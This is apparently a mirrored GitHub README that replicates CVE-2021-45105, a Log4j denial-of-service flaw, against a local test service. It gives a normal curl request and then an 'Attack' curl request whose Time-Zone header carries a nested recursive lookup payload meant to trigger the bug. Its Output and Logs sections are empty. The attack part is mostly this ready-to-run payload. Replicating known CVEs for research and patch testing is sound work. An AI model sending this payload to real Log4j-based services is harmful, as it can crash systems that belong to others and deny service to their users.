Share
## https://sploitus.com/exploit?id=E1FC5745-FCD7-58AF-9F4D-65D94090BBAB
# tejas-nagchandi/CVE-2021-45105
Replicating CVE-2021-45105
## API
```
curl -I localhost:8080/currentDateTime -H 'Time-Zone: GMT'
```
Output:

## Attack
```
curl -I localhost:8080/currentDateTime -H 'Time-Zone: ${${::-${::-$${::-$}}}}'
```
Output:

Logs:

## Reference:
* https://vulners.com/cve/CVE-2021-45105